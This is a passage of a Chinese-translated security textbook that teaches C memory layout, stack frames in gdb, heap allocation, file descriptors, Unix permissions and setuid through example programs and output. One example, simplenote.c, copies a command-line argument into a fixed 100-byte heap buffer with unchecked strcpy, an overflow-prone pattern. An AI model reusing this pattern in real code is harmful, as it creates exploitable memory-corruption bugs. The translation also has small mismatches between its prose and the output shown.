Breakpoint 1, main () at stack_example.c:10
10         test_function(1, 2, 3, 4);
(gdb) i r esp ebp eip
esp            0xbffff7f0       0xbffff7f0
ebp            0xbffff808       0xbffff808
eip            0x8048367        0x8048367 <main+16>
(gdb) x/5i $eip
0x8048367 <main+16>:    mov    DWORD PTR [esp+12],0x4
0x804836f <main+24>:    mov    DWORD PTR [esp+8],0x3
0x8048377 <main+32>:    mov    DWORD PTR [esp+4],0x2
0x804837f <main+40>:    mov    DWORD PTR [esp],0x1
0x8048386 <main+47>:    call   0x8048344 <test_function>
(gdb)

这个断点正好在创建 test_function() 调用的堆栈帧之前。这意味着这个新堆栈帧的底部位于当前 ESP 的值，0xbffff7f0。下一个断点正好在 test_function() 的过程序言之后，所以继续执行将构建堆栈帧。下面的输出显示了第二个断点处的类似信息。局部变量（flag 和 buffer）相对于帧指针（EBP）进行引用。

(gdb) cont
Continuing.

Breakpoint 2, test_function (a=1, b=2, c=3, d=4) at stack_example.c:5
5          flag = 31337;
(gdb) i r esp ebp eip
esp            0xbffff7c0       0xbffff7c0
ebp            0xbffff7e8       0xbffff7e8
eip            0x804834a        0x804834a <test_function+6>
(gdb) disass test_function
Dump of assembler code for function test_function:
0x08048344 <test_function+0>:   push   ebp
0x08048345 <test_function+1>:   mov    ebp,esp
0x08048347 <test_function+3>:   sub    esp,0x28
0x0804834a <test_function+6>:   mov    DWORD PTR [ebp-12],0x7a69
0x08048351 <test_function+13>:  mov    BYTE PTR [ebp-40],0x41
0x08048355 <test_function+17>:  leave
0x08048356 <test_function+18>:  ret
End of assembler dump.
(gdb) print $ebp-12
$1 = (void *) 0xbffff7dc
(gdb) print $ebp-40
$2 = (void *) 0xbffff7c0
(gdb) x/16xw $esp
0xbffff7c0:   0x00000000      0x08049548      0xbffff7d8      0x08048249
0xbffff7d0:     0xb7f9f729      0xb7fd6ff4      0xbffff808      0x080483b9
0xbffff7e0:     0xb7fd6ff4      0xbffff89c      0xbffff808      0x0804838b
0xbffff7f0:      `0x00000001      0x00000002      0x00000003      0x00000004`
(gdb)

堆栈帧在堆栈的末尾显示。函数的四个参数可以在堆栈帧的底部看到（），返回地址直接位于其上方（）。之上是 0xbffff808 的保存帧指针（），这是前一个堆栈帧中 EBP 的值。其余的内存为局部堆栈变量 flag 和 buffer 保存。计算它们相对于 EBP 的相对地址以显示它们在堆栈帧中的确切位置。flag 变量的内存显示在和缓冲区变量的内存显示在。堆栈帧中的额外空间只是填充。

执行完成后，整个栈帧将从栈中弹出，EIP 被设置为返回地址，以便程序可以继续执行。如果在函数内部调用了另一个函数，另一个栈帧将被推入栈中，依此类推。随着每个函数的结束，其栈帧将从栈中弹出，以便执行可以返回到上一个函数。这种行为是为什么这个内存段以 FILO（先进后出）数据结构组织的原因。

内存的不同段按照它们被呈现的顺序排列，从较低的内存地址到较高的内存地址。由于大多数人熟悉向下计数的编号列表，较小的内存地址显示在顶部。有些文本将这个顺序颠倒，这可能会非常令人困惑；因此，在这本书中，较小的内存地址总是显示在顶部。大多数调试器也以这种方式显示内存，较小的内存地址在顶部，较高的在底部。

由于堆和栈都是动态的，它们都向对方的方向增长。这最小化了浪费的空间，使得当堆较小时，栈可以更大，反之亦然。

图 0x200-2。

C 语言中的内存段

在 C 语言中，与其他编译型语言一样，编译后的代码存放在文本段，而变量则位于剩余的段中。变量将被存储在哪个内存段中，取决于变量的定义方式。在函数外部定义的变量被认为是全局变量。也可以在任意变量声明前加上static关键字，使变量成为静态变量。如果静态或全局变量被初始化为数据，它们将被存储在数据内存段中；否则，这些变量将被放置在 bss 内存段中。堆内存段的内存必须首先使用名为malloc()的内存分配函数进行分配。通常，指针用于引用堆上的内存。最后，剩余的函数变量被存储在堆栈内存段中。由于堆栈可以包含许多不同的栈帧，因此栈变量可以在不同的功能上下文中保持唯一性。memory_segments.c程序将帮助解释 C 语言中的这些概念。

memory_segments.c

#include <stdio.h>

int global_var;

int global_initialized_var = 5;

void function() {  // This is just a demo function.
   int stack_var; // Notice this variable has the same name as the one in main().

   printf("the function's stack_var is at address 0x%08x\n", &stack_var);
}

int main() {
   int stack_var; // Same name as the variable in function()
   static int static_initialized_var = 5;
   static int static_var;
   int *heap_var_ptr;

   heap_var_ptr = (int *) malloc(4);

   // These variables are in the data segment.
   printf("global_initialized_var is at address 0x%08x\n", &global_initialized_var);
   printf("static_initialized_var is at address 0x%08x\n\n", &static_initialized_var);

   // These variables are in the bss segment.
   printf("static_var is at address 0x%08x\n", &static_var);
   printf("global_var is at address 0x%08x\n\n", &global_var);

   // This variable is in the heap segment.
   printf("heap_var is at address 0x%08x\n\n", heap_var_ptr);

   // These variables are in the stack segment.
   printf("stack_var is at address 0x%08x\n", &stack_var);
   function(); 
}

由于变量命名具有描述性，大部分代码相当直观。全局和静态变量声明方式如前所述，并且也声明了初始化后的对应变量。栈变量在main()和function()中都被声明，以展示函数上下文的影响。堆变量实际上被声明为一个整数指针，它将指向堆内存段上分配的内存。调用malloc()函数在堆上分配四个字节。由于新分配的内存可以是任何数据类型，malloc()函数返回一个空指针，需要将其转换为整数指针。

reader@hacking:~/booksrc $ gcc memory_segments.c
reader@hacking:~/booksrc $ ./a.out 
global_initialized_var is at address 0x080497ec
static_initialized_var is at address 0x080497f0

static_var is at address 0x080497f8
global_var is at address 0x080497fc

heap_var is at address 0x0804a008

stack_var is at address 0xbffff834
the function's stack_var is at address 0xbffff814
reader@hack ing:~/booksrc $

前两个初始化变量具有最低的内存地址，因为它们位于数据内存段。接下来的两个变量，static_var和global_var，存储在 bss 内存段，因为它们未初始化。这些内存地址略大于前一个变量的地址，因为 bss 段位于数据段下方。由于这两个内存段在编译后都具有固定的大小，因此几乎没有浪费的空间，地址之间也不是很远。

堆变量存储在堆段上分配的空间中，该段位于 bss 段下方。请记住，这个段的内存不是固定的，以后还可以动态分配更多空间。最后，最后两个stack_var具有非常大的内存地址，因为它们位于栈段。栈中的内存也不是固定的；然而，这个内存从底部开始，向后增长到堆段。这允许两个内存段都是动态的，而不会在内存中浪费空间。main()函数上下文中的第一个stack_var存储在栈段内的栈帧中。function()中的第二个stack_var有自己的独特上下文，因此该变量存储在栈段中的不同栈帧中。当在程序接近结束时调用function()，会创建一个新的栈帧来存储（其他事物中包括）function()上下文的stack_var。由于栈随着每个新的栈帧向上增长到堆段，因此第二个stack_var（0xbffff814）的内存地址小于在main()上下文中找到的第一个stack_var（0xbffff834）的地址。

使用堆

使用其他内存段仅仅是变量声明方式的问题。然而，使用堆则需要更多的努力。正如之前所演示的，在堆上分配内存是通过使用malloc()函数来完成的。这个函数接受一个大小作为其唯一的参数，并在堆段中保留相应大小的空间，以空指针的形式返回该内存的起始地址。如果由于某种原因malloc()函数无法分配内存，它将简单地返回一个值为 0 的 NULL 指针。相应的释放函数是free()。这个函数接受一个指针作为其唯一的参数，并释放堆上的内存空间，以便以后再次使用。这些相对简单的函数在 heap_example.c 中得到了演示。

heap_example.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char *char_ptr;  // A char pointer
   int *int_ptr;    // An integer pointer
   int mem_size;

   if (argc < 2)     // If there aren't command-line arguments,
      mem_size = 50; // use 50 as the default value.
   else
      mem_size = atoi(argv[1]);

   printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size);
   char_ptr = (char *) malloc(mem_size); // Allocating heap memory

   if(char_ptr == NULL) {  // Error checking, in case malloc() fails
      fprintf(stderr, "Error: could not allocate heap memory.\n");
      exit(-1);
   }

   strcpy(char_ptr, "This is memory is located on the heap.");
   printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr);

   printf("\t[+] allocating 12 bytes of memory on the heap for int_ptr\n");
   int_ptr = (int *) malloc(12); // Allocated heap memory again

   if(int_ptr == NULL) {  // Error checking, in case malloc() fails
      fprintf(stderr, "Error: could not allocate heap memory.\n");
      exit(-1);
   }

   *int_ptr = 31337; // Put the value of 31337 where int_ptr is pointing.
   printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr);

   printf("\t[-] freeing char_ptr's heap memory...\n");
   free(char_ptr); // Freeing heap memory

   printf("\t[+] allocating another 15 bytes for char_ptr\n");
   char_ptr = (char *) malloc(15); // Allocating more heap memory

   if(char_ptr == NULL) {  // Error checking, in case malloc() fails
      fprintf(stderr, "Error: could not allocate heap memory.\n");
      exit(-1);
   }

   strcpy(char_ptr, "new memory");
   printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr);

   printf("\t[-] freeing int_ptr's heap memory...\n");
   free(int_ptr); // Freeing heap memory
   printf("\t[-] freeing char_ptr's heap memory...\n");
   free(char_ptr); // Freeing the other block of heap memory 
}

这个程序接受一个命令行参数作为第一次内存分配的大小，默认值为 50。然后它使用malloc()和free()函数在堆上分配和释放内存。程序中有大量的printf()语句来调试程序执行时实际发生的事情。由于malloc()不知道它正在分配哪种类型的内存，它返回一个指向新分配堆内存的空指针，这必须转换为适当类型。在每次malloc()调用之后，都有一个错误检查块来检查分配是否失败。如果分配失败且指针为 NULL，则使用fprintf()将错误消息打印到标准错误，并退出程序。fprintf()函数与printf()非常相似；然而，它的第一个参数是stderr，这是一个用于显示错误的标准文件流。这个函数将在稍后进行更多解释，但现在，它只是用作正确显示错误的一种方式。程序的其余部分相当直接。

reader@hacking:~/booksrc $ gcc -o heap_example heap_example.c
reader@hacking:~/booksrc $ ./heap_example
        [+] allocating 50 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap.'
        [+] allocating 12 bytes of memory on the heap for int_ptr
int_ptr (0x804a040) --> 31337
        [-] freeing char_ptr's heap memory...
        [+] allocating another 15 bytes for char_ptr
char_ptr (0x804a050) --> 'new memory'
        [-] freeing int_ptr's heap memory...
        [-] freeing char_ptr's heap memory... 
reader@hacking:~/booksrc $

在前面的输出中，注意每个内存块在堆中都有一个递增更高的内存地址。尽管前 50 字节已被释放，但当请求额外的 15 字节时，它们被放置在为int_ptr分配的 12 字节之后。堆分配函数控制这种行为，可以通过改变初始内存分配的大小来探索。

reader@hacking:~/booksrc $ ./heap_example 100
        [+] allocating 100 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap.'
        [+] allocating 12 bytes of memory on the heap for int_ptr
int_ptr (0x804a070) --> 31337
        [-] freeing char_ptr's heap memory...
        [+] allocating another 15 bytes for char_ptr
char_ptr (0x804a008) --> 'new memory'
        [-] freeing int_ptr's heap memory...
        [-] freeing char_ptr's heap memory...
reader@hacking:~/booksrc $

如果分配了一个较大的内存块然后释放，最终的 15 字节分配将发生在释放的内存空间中。通过实验不同的值，你可以找出分配函数何时选择回收释放的空间以供新的分配使用。通常，简单的信息性printf()语句和一些实验可以揭示许多关于底层系统的东西。

带错误检查的 malloc()

在 heap_example.c 中，对 malloc() 调用进行了多次错误检查。尽管 malloc() 调用从未失败，但在 C 语言编程中处理所有潜在情况是很重要的。但是，由于有多个 malloc() 调用，错误检查代码需要出现在多个地方。这通常会使代码看起来杂乱无章，如果需要修改错误检查代码或需要新的 malloc() 调用，这会很不方便。由于每个 malloc() 调用的错误检查代码基本上都是相同的，这是一个使用函数而不是在多个地方重复相同指令的完美场所。请查看 errorchecked_heap.c 以获取示例。

errorchecked_heap.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void *errorchecked_malloc(unsigned int); // Function prototype for errorchecked_malloc()

int main(int argc, char *argv[]) {
   char *char_ptr;  // A char pointer
   int *int_ptr;    // An integer pointer
   int mem_size;

   if (argc < 2)     // If there aren't command-line arguments,
      mem_size = 50; // use 50 as the default value.
   else
      mem_size = atoi(argv[1]);

   printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size);
   char_ptr = (char *) errorchecked_malloc(mem_size); // Allocating heap memory

   strcpy(char_ptr, "This is memory is located on the heap.");
   printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr);
   printf("\t[+] allocating 12 bytes of memory on the heap for int_ptr\n");
   int_ptr = (int *) errorchecked_malloc(12); // Allocated heap memory again

   *int_ptr = 31337; // Put the value of 31337 where int_ptr is pointing.
   printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr);

   printf("\t[-] freeing char_ptr's heap memory...\n");
   free(char_ptr); // Freeing heap memory

   printf("\t[+] allocating another 15 bytes for char_ptr\n");
   char_ptr = (char *) errorchecked_malloc(15); // Allocating more heap memory

   strcpy(char_ptr, "new memory");
   printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr);

   printf("\t[-] freeing int_ptr's heap memory...\n");
   free(int_ptr); // Freeing heap memory
   printf("\t[-] freeing char_ptr's heap memory...\n");
   free(char_ptr); // Freeing the other block of heap memory
}

void *errorchecked_malloc(unsigned int size) { // An error-checked malloc() function
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL) {
      fprintf(stderr, "Error: could not allocate heap memory.\n");
      exit(-1);
   }
   return ptr; 
}

errorchecked_heap.c 程序基本上等同于之前的 heap_example.c 代码，除了将堆内存分配和错误检查合并到一个函数中。代码的第一行 void *errorchecked_malloc(unsigned int); 是函数原型。这使编译器知道将有一个名为 errorchecked_malloc() 的函数，它期望一个无符号整数参数，并返回一个 void 指针。实际的函数可以放在任何地方；在这种情况下，它位于 main() 函数之后。该函数本身相当简单；它只是接受要分配的字节数，并尝试使用 malloc() 分配这么多内存。如果分配失败，错误检查代码将显示错误并退出程序；否则，它将返回指向新分配堆内存的指针。这样，自定义的 errorchecked_malloc() 函数就可以用来替代正常的 malloc()，从而消除后续重复错误检查的需要。这种方式开始凸显使用函数编程的实用性。

建立在基础之上

一旦你理解了 C 编程的基本概念，其余的部分就相对简单了。C 语言的强大之处主要来自于使用其他函数。实际上，如果从任何先前的程序中移除这些函数，剩下的将只是非常基础的语句。

文件访问

在 C 语言中访问文件主要有两种方式：文件描述符和文件流。文件描述符使用一组低级 I/O 函数，而文件流是基于低级函数构建的更高层次的缓冲 I/O 形式。有些人认为文件流函数更容易编程；然而，文件描述符更为直接。在这本书中，我们将重点关注使用文件描述符的低级 I/O 函数。

这本书背面的条形码代表一个数字。因为这个数字在书店中的其他书籍中是唯一的，收银员可以在结账时扫描这个数字，并使用它来参考商店数据库中关于这本书的信息。同样，文件描述符是一个用于引用打开文件的数字。使用文件描述符的四个常见函数是 open()、close()、read() 和 write()。所有这些函数在出现错误时都会返回 -1。open() 函数用于打开一个文件以供读取和/或写入，并返回一个文件描述符。返回的文件描述符只是一个整数值，但在打开的文件中是唯一的。文件描述符作为参数传递给其他函数，就像指向打开文件的指针一样。对于 close() 函数，文件描述符是唯一的参数。read() 和 write() 函数的参数是文件描述符、指向要读取或写入的数据的指针以及从该位置读取或写入的字节数。open() 函数的参数是要打开的文件名的指针以及一系列预定义的标志，这些标志指定了访问模式。这些标志及其用法将在稍后进行深入解释，但现在让我们看看一个使用文件描述符的简单记事程序——simplenote.c。这个程序接受一个命令行参数作为笔记，并将其添加到 /tmp/notes 文件的末尾。这个程序使用了几个函数，包括一个看起来熟悉的错误检查堆内存分配函数。其他函数用于显示用法消息和处理致命错误。usage() 函数在 main() 之前简单地定义，因此不需要函数原型。

simplenote.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // A function for fatal errors
void *ec_malloc(unsigned int); // An error-checked malloc() wrapper

int main(int argc, char *argv[]) {
   int fd; // file descriptor
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/tmp/notes");

   if(argc < 2)                 // If there aren't command-line arguments,
      usage(argv[0], datafile); // display usage message and exit.
   strcpy(buffer, argv[1]);     // Copy into buffer.

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] data file @ %p: \'%s\'\n", datafile, datafile);

   strncat(buffer, "\n", 1); // Add a newline on the end.

// Opening file
   fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
   if(fd == -1)
      fatal("in main() while opening file");
   printf("[DEBUG] file descriptor is %d\n", fd);
// Writing data
   if(write(fd, buffer, strlen(buffer)) == -1)
      fatal("in main() while writing buffer to file");
// Closing file
   if(close(fd) == -1)
      fatal("in main() while closing file");

   printf("Note has been saved.\n");
   free(buffer);
   free(datafile);
}

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error-checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr; 
}

除了在 open() 函数中使用的看起来奇怪的标志外，大部分代码应该是可读的。还有一些我们之前没有使用过的标准函数。strlen() 函数接受一个字符串并返回其长度。它与 write() 函数一起使用，因为它需要知道要写入多少字节。perror() 函数是 print error 的缩写，并在 fatal() 中用于在退出前打印一个额外的错误消息（如果有的话）。

reader@hacking:~/booksrc $ gcc -o simplenote simplenote.c 
reader@hacking:~/booksrc $ ./simplenote 
Usage: ./simplenote <data to add to /tmp/notes>
reader@hacking:~/booksrc $ ./simplenote "this is a test note"
[DEBUG] buffer   @ 0x804a008: 'this is a test note'
[DEBUG] data file @ 0x804a070: '/tmp/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ cat /tmp/notes 
this is a test note
reader@hacking:~/booksrc $ ./simplenote "great, it works"
[DEBUG] buffer   @ 0x804a008: 'great, it works'
[DEBUG] datafile @ 0x804a070: '/tmp/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ cat /tmp/notes 
this is a test note
great, it works
reader@hacking:~/booksrc $

程序执行的输出相当直观，但关于源代码还有一些需要进一步解释的地方。由于 fcntl.h 和 sys/stat.h 文件定义了与 open() 函数一起使用的标志，因此必须包含这些文件。第一组标志位于 fcntl.h 中，用于设置访问模式。访问模式必须使用以下三个标志之一：

`O_RDONLY` 以只读方式打开文件。
`O_WRONLY` 以只写方式打开文件。
`O_RDWR` 以读写方式打开文件。

这些标志可以使用位或运算符与几个其他可选标志组合。以下是一些更常见且有用的标志：

`O_APPEND` 在文件末尾写入数据。
`O_TRUNC` 如果文件已存在，则将文件截断到 0 长度。
`O_CREAT` 如果文件不存在，则创建文件。

位操作使用标准逻辑门，如或和与，来组合位。当两个位进入一个或门时，如果第一个位或第二个位中的任何一个为 1，则结果为 1。如果两个位进入一个与门，只有当第一个位和第二个位都为 1 时，结果才为 1。32 位全值可以使用这些位操作符对每个对应的位执行逻辑操作。bitwise.c 的源代码和程序输出演示了这些位操作。

bitwise.c

#include <stdio.h>

int main() {
   int i, bit_a, bit_b;
   printf("bitwise OR operator  |\n");
   for(i=0; i < 4; i++) {
      bit_a = (i & 2) / 2; // Get the second bit.
      bit_b = (i & 1);     // Get the first bit.
      printf("%d | %d = %d\n", bit_a, bit_b, bit_a | bit_b);
   }
   printf("\nbitwise AND operator  &\n");
   for(i=0; i < 4; i++) {
      bit_a = (i & 2) / 2; // Get the second bit.
      bit_b = (i & 1);     // Get the first bit.
      printf("%d & %d = %d\n", bit_a, bit_b, bit_a & bit_b);
   } 
}

编译和执行 bitwise.c 的结果如下。

reader@hacking:~/booksrc $ gcc bitwise.c
reader@hacking:~/booksrc $ ./a.out
bitwise OR operator  |
0 | 0 = 0
0 | 1 = 1
1 | 0 = 1
1 | 1 = 1

bitwise AND operator  &
0 & 0 = 0
0 & 1 = 0
1 & 0 = 0
1 & 1 = 1 
reader@hacking:~/booksrc $

用于 open() 函数的标志具有与单个位对应的值。这样，标志可以通过或逻辑组合，而不会破坏任何信息。fcntl_flags.c 程序及其输出探讨了 fcntl.h 中定义的一些标志值以及它们是如何相互组合的。

fcntl_flags.c

#include <stdio.h>
#include <fcntl.h>

void display_flags(char *, unsigned int);
void binary_print(unsigned int);

int main(int argc, char *argv[]) {
   display_flags("O_RDONLY\t\t", O_RDONLY);
   display_flags("O_WRONLY\t\t", O_WRONLY);
   display_flags("O_RDWR\t\t\t", O_RDWR);
   printf("\n");
   display_flags("O_APPEND\t\t", O_APPEND);
   display_flags("O_TRUNC\t\t\t", O_TRUNC);
   display_flags("O_CREAT\t\t\t", O_CREAT);
   printf("\n");
   display_flags("O_WRONLY|O_APPEND|O_CREAT", O_WRONLY|O_APPEND|O_CREAT);
}

void display_flags(char *label, unsigned int value) {
   printf("%s\t: %d\t:", label, value);
   binary_print(value);
   printf("\n");
}

void binary_print(unsigned int value) {
   unsigned int mask = 0xff000000; // Start with a mask for the highest byte.
   unsigned int shift = 256*256*256; // Start with a shift for the highest byte.
   unsigned int byte, byte_iterator, bit_iterator;

   for(byte_iterator=0; byte_iterator < 4; byte_iterator++) {
      byte = (value & mask) / shift; // Isolate each byte.
      printf(" ");
      for(bit_iterator=0; bit_iterator < 8; bit_iterator++) { // Print the byte's bits.
         if(byte & 0x80) // If the highest bit in the byte isn't 0,
            printf("1");       // print a 1.
         else
            printf("0");       // Otherwise, print a 0.
         byte *= 2;         // Move all the bits to the left by 1.
      }
      mask /= 256;       // Move the bits in mask right by 8.
      shift /= 256;      // Move the bits in shift right by 8.
   } 
}

编译和执行 fcntl_flags.c 的结果如下。

reader@hacking:~/booksrc $ gcc fcntl_flags.c 
reader@hacking:~/booksrc $ ./a.out
O_RDONLY                        : 0     : 00000000 00000000 00000000 00000000
O_WRONLY                        : 1     : 00000000 00000000 00000000 00000001
O_RDWR                          : 2     : 00000000 00000000 00000000 00000010

O_APPEND                        : 1024  : 00000000 00000000 00000100 00000000
O_TRUNC                         : 512   : 00000000 00000000 00000010 00000000
O_CREAT                         : 64    : 00000000 00000000 00000000 01000000

O_WRONLY|O_APPEND|O_CREAT       : 1089  : 00000000 00000000 00000100 01000001 
$

使用位标志与位逻辑结合是一种高效且常用的技术。只要每个标志都是一个只有唯一位被打开的数字，对这些值进行位或操作的效果就等同于它们的和。在 fcntl_flags.c 中，1 + 1024 + 64 = 1089。尽管如此，这种方法只有在所有位都是唯一的时候才有效。

文件权限

如果在 open() 函数的访问模式中使用 O_CREAT 标志，则需要额外的参数来定义新创建文件的文件权限。此参数使用在 sys/stat.h 中定义的位标志，可以通过位或逻辑组合在一起。

`S_IRUSR` 给文件用户（所有者）读权限。
`S_IWUSR` 给文件用户（所有者）写权限。
`S_IXUSR` 给文件用户（所有者）执行权限。
`S_IRGRP` 给文件组读权限。
`S_IWGRP` 给文件组写权限。
`S_IXGRP` 给文件组执行权限。
`S_IROTH` 给文件其他（任何人）读权限。
`S_IWOTH` 给文件其他（任何人）写权限。
`S_IXOTH` 给文件其他（任何人）执行权限。

如果你已经熟悉 Unix 文件权限，那么这些标志应该对你来说非常合理。如果它们不合理，这里有一个 Unix 文件权限的快速入门课程。

每个文件都有一个所有者和一个组。这些值可以使用 ls -l 显示，以下输出中显示了这些值。

reader@hacking:~/booksrc $ ls -l /etc/passwd simplenote*
-rw-r--r-- 1 root   root   1424 2007-09-06 09:45 /etc/passwd
-rwxr-xr-x 1 reader reader 8457 2007-09-07 02:51 simplenote
-rw------- 1 reader reader 1872 2007-09-07 02:51 simplenote.c 
reader@hacking:~/booksrc $

对于 /etc/passwd 文件，所有者是 root，组也是 root。对于其他两个 simplenote 文件，所有者是 reader，组是 users。

读、写、执行权限可以针对三个不同的字段：用户、组和其他进行开启和关闭。用户权限描述文件所有者可以做什么（读、写和/或执行），组权限描述该组中的用户可以做什么，其他权限描述其他所有人可以做什么。这些字段也在ls -l输出的前面显示。首先显示用户读/写/执行权限，使用r表示读，w表示写，x表示执行，-表示关闭。接下来的三个字符显示组权限，最后三个字符是其他权限。在上面的输出中，simplenote 程序的所有三个用户权限都已开启（以粗体显示）。每个权限对应一个位标志；读是 4（二进制中的 100），写是 2（二进制中的 010），执行是 1（二进制中的 001）。由于每个值只包含唯一的位，位或操作可以达到与将这些数字相加相同的结果。这些值可以相加，以使用chmod命令定义用户、组和其他用户的权限。

reader@hacking:~/booksrc $ chmod 731 simplenote.c
reader@hacking:~/booksrc $ ls -l simplenote.c
-rwx-wx--x 1 reader reader 1826 2007-09-07 02:51 simplenote.c
reader@hacking:~/booksrc $ chmod ugo-wx simplenote.c
reader@hacking:~/booksrc $ ls -l simplenote.c
-r-------- 1 reader reader 1826 2007-09-07 02:51 simplenote.c
reader@hacking:~/booksrc $ chmod u+w simplenote.c
reader@hacking:~/booksrc $ ls -l simplenote.c
-rw------- 1 reader reader 1826 2007-09-07 02:51 simplenote.c
reader@hacking:~/booksrc $

第一个命令（chmod 721）为用户赋予读、写和执行权限，因为第一个数字是 7（4 + 2 + 1），为组赋予写和执行权限，因为第二个数字是 3（2 + 1），为其他用户只赋予执行权限，因为第三个数字是 1。权限也可以通过chmod命令添加或移除。在下一个chmod命令中，参数ugo-wx意味着从用户、组和其他用户中移除读写执行权限。最后的chmod u+w命令为用户赋予写权限。

在 simplenote 程序中，open()函数使用S_IRUSR|S_IWUSR作为其附加权限参数，这意味着在创建时/tmp/notes 文件应该只有用户读和写权限。

reader@hacking:~/booksrc $ ls -l /tmp/notes 
-rw------- 1 reader reader 36 2007-09-07 02:52 /tmp/notes 
reader@hacking:~/booksrc $

用户 ID

Unix 系统上的每个用户都有一个唯一的用户 ID 号。这个用户 ID 可以使用id命令显示。

reader@hacking:~/booksrc $ id reader
`uid=999(reader)` gid=999(reader)
groups=999(reader),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),4
4(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(a
dmin)
reader@hacking:~/booksrc $ id matrix
uid=500(matrix) gid=500(matrix) groups=500(matrix)
reader@hacking:~/booksrc $ id root
uid=0(root) gid=0(root) groups=0(root)
reader@hacking:~/booksrc $

根用户（用户 ID 为 0）类似于管理员账户，它对系统拥有完全访问权限。可以使用su命令切换到不同的用户，如果这个命令以 root 身份运行，则无需密码即可完成。sudo命令允许单个命令以 root 用户身份运行。在 LiveCD 上，为了简化操作，sudo已被配置为无需密码即可执行。这些命令提供了一种简单的方法来快速在用户之间切换。

reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ id
uid=501(jose) gid=501(jose) groups=501(jose)
jose@hacking:/home/reader/booksrc $

作为 jose 用户，如果执行 simplenote 程序，它将以 jose 的身份运行，但无法访问/tmp/notes 文件。这个文件属于 reader 用户，并且只允许所有者读写权限。

jose@hacking:/home/reader/booksrc $ ls -l /tmp/notes
-rw------- 1 reader reader 36 2007-09-07 05:20 /tmp/notes
jose@hacking:/home/reader/booksrc $ ./simplenote "a note for jose"
[DEBUG] buffer   @ 0x804a008: 'a note for jose'
[DEBUG] datafile @ 0x804a070: '/tmp/notes'
[!!] Fatal Error in main() while opening file: Permission denied
jose@hacking:/home/reader/booksrc $ cat /tmp/notes
cat: /tmp/notes: Permission denied
jose@hacking:/home/reader/booksrc $ exit
exit
reader@hacking:~/booksrc $

如果读者是 simplenote 程序的唯一用户，这没问题；然而，很多时候，多个用户需要能够访问同一文件的某些部分。例如，/etc/passwd 文件包含系统上每个用户的账户信息，包括每个用户的默认登录 shell。chsh 命令允许任何用户更改自己的登录 shell。此程序需要能够更改 /etc/passwd 文件，但仅限于与当前用户账户相关的行。Unix 中解决此问题的方法是设置 set user ID (setuid) 权限。这是一个可以使用 chmod 设置的附加文件权限位。当带有此标志的程序执行时，它将以文件所有者的用户 ID 运行。

reader@hacking:~/booksrc $ which chsh
/usr/bin/chsh
reader@hacking:~/booksrc $ ls -l /usr/bin/chsh /etc/passwd
-rw-r--r-- 1 root root  1424 2007-09-06 21:05 /etc/passwd
-rwsr-xr-x 1 root root 23920 2006-12-19 20:35 /usr/bin/chsh
reader@hacking:~/booksrc $

chsh 程序设置了 setuid 标志，这在上面 ls 输出的 s 中有所指示。由于此文件属于 root 用户并且设置了 setuid 权限，因此当任何用户运行此程序时，程序将以 root 用户身份运行。chsh 写入的 /etc/passwd 文件也属于 root 用户，并且只允许所有者写入。chsh 中的程序逻辑设计为只允许写入与运行程序的用户对应的 /etc/passwd 中的行，尽管程序实际上是以 root 身份运行的。这意味着正在运行程序具有真实用户 ID 和有效用户 ID。这些 ID 可以分别使用 getuid() 和 geteuid() 函数检索，如 uid_demo.c 中所示。

uid_demo.c

#include <stdio.h>

int main() {
   printf("real uid: %d\n", getuid());
   printf("effective uid: %d\n", geteuid()); 
}

编译和执行 uid_demo.c 的结果如下。

reader@hacking:~/booksrc $ gcc -o uid_demo uid_demo.c
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 reader reader 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $ ./uid_demo
real uid: 999
effective uid: 999
reader@hacking:~/booksrc $ sudo chown root:root ./uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $ ./uid_demo 
real uid: 999
effective uid: 999 
reader@hacking:~/booksrc $

在 uid_demo.c 的输出中，当执行 uid_demo 时，两个用户 ID 都显示为 999，因为 999 是读者的用户 ID。接下来，使用 sudo 命令与 chown 命令一起使用，将 uid_demo 的所有者和组更改为 root。由于程序对其他用户有执行权限，因此程序仍然可以执行，并且它显示两个用户 ID 仍然为 999，因为那仍然是用户的 ID。

reader@hacking:~/booksrc $ chmod u+s ./uid_demo
chmod: changing permissions of `./uid_demo': Operation not permitted
reader@hacking:~/booksrc $ sudo chmod u+s ./uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
